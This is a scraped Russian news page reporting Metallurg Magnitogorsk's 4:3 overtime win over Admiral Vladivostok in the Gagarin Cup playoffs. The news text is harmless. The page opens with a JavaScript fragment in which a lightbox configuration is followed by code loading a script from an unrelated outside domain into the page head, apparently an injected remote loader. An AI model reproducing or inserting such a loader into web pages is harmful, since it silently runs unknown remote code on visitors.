, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Магнитогорский «Металлург» выбил «Адмирал» из борьбы за Кубок Гагарина

В Магнитогорске завершилась серия между "Металлургом" и "Адмиралом" из Владивостока. Победив в овертайме со счетом 4:3, южноуральская команда вышла в следующий раунд розыгрыша Кубка Гагарина. Победу металлургам принес точный бросок капитана Сергея Мозякина на 4 минуте овертайма.

Отметим, что гости в этом матче проявили недюжинный характер. Сначала они отыгравшись после счета 0:2, а в концовке основного времени матча при счете 3:2 в пользу "Металлурга", дальневосточники сняли вратаря и сравняли счет, переведя игру в овертайм.

В целом же серию "Металлурга" и "Адмирала" можно назвать одной из самых зрелищных в этом розыгрыше Кубка Гагарина. Несмотря на то, что победитель определился в пяти матчах, в каждом поединке на льду шла ожесточенная борьба. В трех встречах победитель определялся лишь в дополнительное время, всего же соперники сыграли шесть овертаймов. Есть большие сомнения сумел ли бы челябинский "Трактор", уступивший "Адмиралу" в борьбе за 8 место, оказать такое яростное сопротивление победителю Восточной Конференции.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
17:12 - 15 марта 2014
|
автор: U-RSS
|
(427)
|
(0)

Комментарии (0)

Я человек
Я бот